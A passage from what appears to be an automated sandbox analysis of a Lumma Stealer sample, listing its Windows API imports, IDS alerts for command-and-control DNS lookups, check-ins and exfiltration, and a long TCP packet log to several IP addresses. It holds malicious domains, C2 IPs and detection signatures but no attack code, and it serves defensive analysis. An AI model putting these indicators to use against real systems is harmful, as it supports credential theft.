DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:35:42.674538+0100 | 2058616 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) | 1 | 192.168.2.7 | 59142 | 1.1.1.1 | 53 | UDP |
2025-01-07T14:35:42.693790+0100 | 2058598 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) | 1 | 192.168.2.7 | 59418 | 1.1.1.1 | 53 | UDP |
2025-01-07T14:35:42.707734+0100 | 2058632 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) | 1 | 192.168.2.7 | 62120 | 1.1.1.1 | 53 | UDP |
2025-01-07T14:35:42.718754+0100 | 2058610 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) | 1 | 192.168.2.7 | 53239 | 1.1.1.1 | 53 | UDP |
2025-01-07T14:35:42.730971+0100 | 2058628 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) | 1 | 192.168.2.7 | 60755 | 1.1.1.1 | 53 | UDP |
2025-01-07T14:35:42.763054+0100 | 2058618 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) | 1 | 192.168.2.7 | 61941 | 1.1.1.1 | 53 | UDP |
2025-01-07T14:35:42.776894+0100 | 2058622 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) | 1 | 192.168.2.7 | 51255 | 1.1.1.1 | 53 | UDP |
2025-01-07T14:35:42.789441+0100 | 2058606 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) | 1 | 192.168.2.7 | 56521 | 1.1.1.1 | 53 | UDP |
2025-01-07T14:35:43.540851+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49906 | 104.102.49.254 | 443 | TCP |
2025-01-07T14:35:44.141971+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.7 | 49906 | 104.102.49.254 | 443 | TCP |
2025-01-07T14:35:44.739237+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49915 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:45.464769+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49915 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:45.464769+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49915 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:45.947478+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49925 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:46.453927+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49925 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:46.453927+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49925 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:47.088727+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49933 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:48.521002+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49942 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:49.507858+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49950 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:50.855564+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49960 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:51.996755+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49967 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:52.481939+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49967 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:53.388322+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49978 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:55.424658+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49981 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:55.881611+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49981 | 104.21.80.1 | 443 | TCP |
2025-01-07T14:35:56.657124+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49983 | 185.161.251.21 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 7, 2025 14:35:42.819173098 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:42.819200993 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:42.819298983 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:42.824099064 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:42.824111938 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:43.540759087 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:43.540851116 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:43.544456959 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:43.544466972 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:43.544764996 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:43.600694895 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:43.602799892 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:43.643337011 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.142000914 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.142024994 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.142031908 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.142056942 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.142067909 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.142081022 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:44.142107964 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.142142057 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:44.142170906 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:44.233217001 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.233228922 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.233309984 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:44.233335972 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.233381987 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:44.238289118 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.238352060 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:44.238359928 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.238401890 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.238440990 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:44.240590096 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:44.240603924 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.240614891 CET | 49906 | 443 | 192.168.2.7 | 104.102.49.254 |
Jan 7, 2025 14:35:44.240621090 CET | 443 | 49906 | 104.102.49.254 | 192.168.2.7 |
Jan 7, 2025 14:35:44.256608963 CET | 49915 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:44.256639957 CET | 443 | 49915 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:44.256709099 CET | 49915 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:44.257390022 CET | 49915 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:44.257405043 CET | 443 | 49915 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:44.739109993 CET | 443 | 49915 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:44.739237070 CET | 49915 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:44.741012096 CET | 49915 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:44.741019011 CET | 443 | 49915 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:44.741278887 CET | 443 | 49915 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:44.742686987 CET | 49915 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:44.742702961 CET | 49915 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:44.742758036 CET | 443 | 49915 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:45.464787960 CET | 443 | 49915 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:45.464862108 CET | 443 | 49915 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:45.465230942 CET | 49915 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:45.465259075 CET | 49915 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:45.465270996 CET | 443 | 49915 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:45.465290070 CET | 49915 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:45.465295076 CET | 443 | 49915 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:45.472367048 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:45.472388029 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:45.472450972 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:45.472764969 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:45.472774029 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:45.947393894 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:45.947478056 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:45.948884010 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:45.948890924 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:45.949136019 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:45.950717926 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:45.950758934 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:45.950793028 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.453938961 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.453999996 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.454032898 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.454075098 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.454098940 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.454112053 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.454138041 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.454447031 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.454487085 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.454495907 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.454500914 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.454554081 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.454808950 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.458738089 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.458774090 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.458792925 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.458800077 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.458844900 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.458849907 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.506969929 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.548250914 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.548321009 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.548350096 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.548363924 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.548373938 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.548408031 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.564311028 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.564408064 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.564469099 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.564538956 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.564538956 CET | 49925 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.564555883 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.564563990 CET | 443 | 49925 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.627044916 CET | 49933 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.627083063 CET | 443 | 49933 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:46.627167940 CET | 49933 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.627546072 CET | 49933 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:46.627563000 CET | 443 | 49933 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:47.088632107 CET | 443 | 49933 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:47.088726997 CET | 49933 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:47.090301037 CET | 49933 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:47.090318918 CET | 443 | 49933 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:47.090565920 CET | 443 | 49933 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:47.091787100 CET | 49933 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:47.091959000 CET | 49933 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:47.091989994 CET | 443 | 49933 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:47.921797991 CET | 443 | 49933 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:47.921905994 CET | 443 | 49933 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:47.921962976 CET | 49933 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:47.922149897 CET | 49933 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:47.922164917 CET | 443 | 49933 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:47.936485052 CET | 49942 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:47.936517000 CET | 443 | 49942 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:47.936619997 CET | 49942 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:47.937043905 CET | 49942 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:47.937057018 CET | 443 | 49942 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:48.520915985 CET | 443 | 49942 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:48.521002054 CET | 49942 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:48.522263050 CET | 49942 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:48.522270918 CET | 443 | 49942 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:48.522536993 CET | 443 | 49942 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:48.523731947 CET | 49942 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:48.523874998 CET | 49942 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:48.523905993 CET | 443 | 49942 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:48.523962021 CET | 49942 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:48.567336082 CET | 443 | 49942 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:48.987782001 CET | 443 | 49942 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:48.987982035 CET | 443 | 49942 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:48.988039017 CET | 49942 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:48.988107920 CET | 49942 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:48.988125086 CET | 443 | 49942 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:49.035078049 CET | 49950 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:49.035111904 CET | 443 | 49950 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:49.035209894 CET | 49950 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:49.035510063 CET | 49950 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:49.035531044 CET | 443 | 49950 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:49.507786036 CET | 443 | 49950 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:49.507858038 CET | 49950 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:49.509058952 CET | 49950 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:49.509073019 CET | 443 | 49950 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:49.509326935 CET | 443 | 49950 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:49.510513067 CET | 49950 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:49.510659933 CET | 49950 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:49.510685921 CET | 443 | 49950 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:49.510737896 CET | 49950 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:49.510749102 CET | 443 | 49950 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:50.177423000 CET | 443 | 49950 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:50.177515984 CET | 443 | 49950 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:50.177582026 CET | 49950 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:50.177772045 CET | 49950 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:50.177788019 CET | 443 | 49950 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:50.401076078 CET | 49960 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:50.401109934 CET | 443 | 49960 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:50.401186943 CET | 49960 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:50.401525021 CET | 49960 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:50.401540041 CET | 443 | 49960 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:50.855469942 CET | 443 | 49960 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:50.855564117 CET | 49960 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:50.856781960 CET | 49960 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:50.856787920 CET | 443 | 49960 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:50.857016087 CET | 443 | 49960 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:50.858290911 CET | 49960 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:50.858290911 CET | 49960 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:50.858326912 CET | 443 | 49960 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:51.289757013 CET | 443 | 49960 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:51.289860964 CET | 443 | 49960 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:51.289972067 CET | 49960 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:51.340001106 CET | 49960 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:51.340020895 CET | 443 | 49960 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:51.511080980 CET | 49967 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:51.511109114 CET | 443 | 49967 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:51.511271954 CET | 49967 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:51.511626005 CET | 49967 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:51.511639118 CET | 443 | 49967 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:51.996669054 CET | 443 | 49967 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:51.996754885 CET | 49967 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:51.998121977 CET | 49967 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:51.998131037 CET | 443 | 49967 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:51.998406887 CET | 443 | 49967 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:51.999769926 CET | 49967 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:51.999900103 CET | 49967 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:51.999905109 CET | 443 | 49967 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:52.481951952 CET | 443 | 49967 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:52.482044935 CET | 443 | 49967 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:52.482100010 CET | 49967 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:52.482294083 CET | 49967 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:52.482301950 CET | 443 | 49967 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:52.765544891 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:52.765556097 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:52.769610882 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:52.769996881 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:52.770006895 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.388250113 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.388322115 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.389713049 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.389719009 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.389951944 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.391176939 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.391990900 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.392021894 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.392163038 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.392189980 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.392329931 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.392359972 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.392505884 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.392529964 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.392674923 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.392700911 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.392880917 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.392909050 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.392918110 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.392931938 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.393059015 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.393081903 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.393110037 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
